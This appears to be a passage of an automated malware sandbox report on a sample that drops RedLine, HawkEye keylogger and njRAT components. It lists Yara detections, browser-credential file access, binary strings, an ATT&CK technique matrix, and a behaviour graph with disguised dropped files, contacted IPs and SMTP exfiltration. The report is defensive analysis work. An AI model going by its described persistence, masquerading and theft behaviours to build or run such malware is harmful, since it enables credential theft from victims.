                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2886cd8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ae6cd8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2aa6a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.460848822.0000000002831000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.421069475.0000000002C51000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RedLine.MainPanel-cracked.exe PID: 4140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RedLine.MainPanel-cracked.exe PID: 7032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RedLine.exe PID: 4236, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Yara detected WebBrowserPassView password recovery toolShow sources
                  Source: Yara matchFile source: 28.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.769c0d.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d49c0d.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.4592050.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.769c0d.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.4592050.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.395296595.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.412155949.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.402244108.0000000004591000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.525622624.00000000046C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.393916948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED

                  Remote Access Functionality:

                  barindex
                  Yara detected HawkEye KeyloggerShow sources
                  Source: Yara matchFile source: 2.2.Keylogger.exe.7bfa72.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.3.Windows Update.exe.6e1b39a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.Keylogger.exe.eb4e92.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.7bfa72.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d9fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.33faa98.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.401046205.000000000384C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.401022146.0000000003844000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.445241123.00000000013F3000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.521512355.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Keylogger.exe PID: 4492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5624, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                  Yara detected NjratShow sources
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2886bc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ae6bc0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2a99190.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2aa6b58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2886cd8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ae6cd8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2aa6a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.460848822.0000000002831000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.421069475.0000000002C51000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RedLine.MainPanel-cracked.exe PID: 4140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RedLine.MainPanel-cracked.exe PID: 7032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RedLine.exe PID: 4236, type: MEMORYSTR
                  Detected HawkEye RatShow sources
                  Source: Keylogger.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                  Source: Keylogger.exeString found in binary or memory: HawkEyeKeylogger
                  Source: Keylogger.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                  Source: Keylogger.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                  Source: Windows Update.exeString found in binary or memory: HawkEyeKeylogger
                  Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                  Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                  Source: Windows Update.exe, 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                  Source: Windows Update.exe, 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                  Source: Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmpString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_05040A8E listen,
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_05040E9E bind,
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_05040A50 CreateMutexW,listen,
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_05040E6B bind,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_05620A8E listen,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_05620E9E bind,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_05620E6B bind,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_05620A50 CreateMutexW,listen,

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Replication Through Removable Media1Windows Management Instrumentation21Startup Items1Startup Items1Disable or Modify Tools211OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScripting1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information11Input Capture211Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsNative API11Application Shimming1Application Shimming1Scripting1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture211Automated ExfiltrationEncrypted Channel1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsShared Modules1Registry Run Keys / Startup Folder321Access Token Manipulation1Obfuscated Files or Information31NTDSSystem Information Discovery18Distributed Component Object ModelClipboard Data2Scheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCommand and Scripting Interpreter1Network Logon ScriptProcess Injection412Software Packing11LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsRemote Access Software1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder321DLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery171VNCGUI Input CaptureExfiltration Over C2 ChannelNon-Application Layer Protocol3Jamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading221DCSyncVirtualization/Sandbox Evasion51Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolApplication Layer Protocol13Rogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion51Proc FilesystemProcess Discovery4Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection412Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CaptureSystem Network Configuration Discovery11Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 524274 Sample: Hpdyv8oO3j.exe Startdate: 18/11/2021 Architecture: WINDOWS Score: 100 86 173.194.79.108, 49805, 49808, 587 GOOGLEUS United States 2->86 88 104.16.154.36, 49792, 80 CLOUDFLARENETUS United States 2->88 90 4 other IPs or domains 2->90 110 Malicious sample detected (through community Yara rule) 2->110 112 Antivirus detection for dropped file 2->112 114 Antivirus / Scanner detection for submitted sample 2->114 116 15 other signatures 2->116 10 Hpdyv8oO3j.exe 13 2->10         started        14 user32dll.exe 2->14         started        signatures3 process4 file5 74 C:\Users\user\AppData\...\hhzclipper.exe, PE32 10->74 dropped 76 C:\Users\user\AppData\Local\Temp\ViRuS.exe, PE32 10->76 dropped 78 C:\Users\...\RedLine.MainPanel-cracked.exe, PE32 10->78 dropped 80 C:\Users\user\AppData\Local\...\Keylogger.exe, PE32 10->80 dropped 118 Creates files with lurking names (e.g. Crack.exe) 10->118 16 RedLine.MainPanel-cracked.exe 3 4 10->16         started        20 Keylogger.exe 8 10->20         started        22 ViRuS.exe 1 4 10->22         started        26 3 other processes 10->26 120 Antivirus detection for dropped file 14->120 122 Multi AV Scanner detection for dropped file 14->122 124 Machine Learning detection for dropped file 14->124 24 taskkill.exe 14->24         started        signatures6 process7 file8 64 C:\Users\user\AppData\Roaming\RedLine.exe, PE32 16->64 dropped 100 Antivirus detection for dropped file 16->100 102 Multi AV Scanner detection for dropped file 16->102 104 Machine Learning detection for dropped file 16->104 28 RedLine.exe 16->28         started        66 C:\Users\user\AppData\...\Windows Update.exe, PE32 20->66 dropped 68 C:\Users\user\AppData\...\Keylogger.exe.log, ASCII 20->68 dropped 33 Windows Update.exe 20->33         started        70 C:\Windows\SysWOW64\user32dll.exe, PE32 22->70 dropped 106 Uses cmd line tools excessively to alter registry or file data 22->106 35 attrib.exe 22->35         started        37 attrib.exe 22->37         started        39 taskkill.exe 22->39         started        41 conhost.exe 24->41         started        72 C:\...\RedLine.MainPanel-cracked.exe.log, ASCII 26->72 dropped 108 Creates files with lurking names (e.g. Crack.exe) 26->108 43 conhost.exe 26->43         started        signatures9 process10 dnsIp11 92 82.202.167.226, 6542 THEFIRST-ASRU Russian Federation 28->92 82 C:\...\61bc7bd88d10e97264127fe545415b17.exe, PE32 28->82 dropped 126 Antivirus detection for dropped file 28->126 128 Multi AV Scanner detection for dropped file 28->128 130 Machine Learning detection for dropped file 28->130 138 5 other signatures 28->138 45 netsh.exe 28->45         started        94 smtp.gmail.com 173.194.79.109, 49753, 587 GOOGLEUS United States 33->94 96 whatismyipaddress.com 104.16.155.36, 49752, 80 CLOUDFLARENETUS United States 33->96 98 2 other IPs or domains 33->98 84 C:\Users\user\AppData\...\WindowsUpdate.exe, PE32 33->84 dropped 132 Creates multiple autostart registry keys 33->132 134 Writes to foreign memory regions 33->134 136 Allocates memory in foreign processes 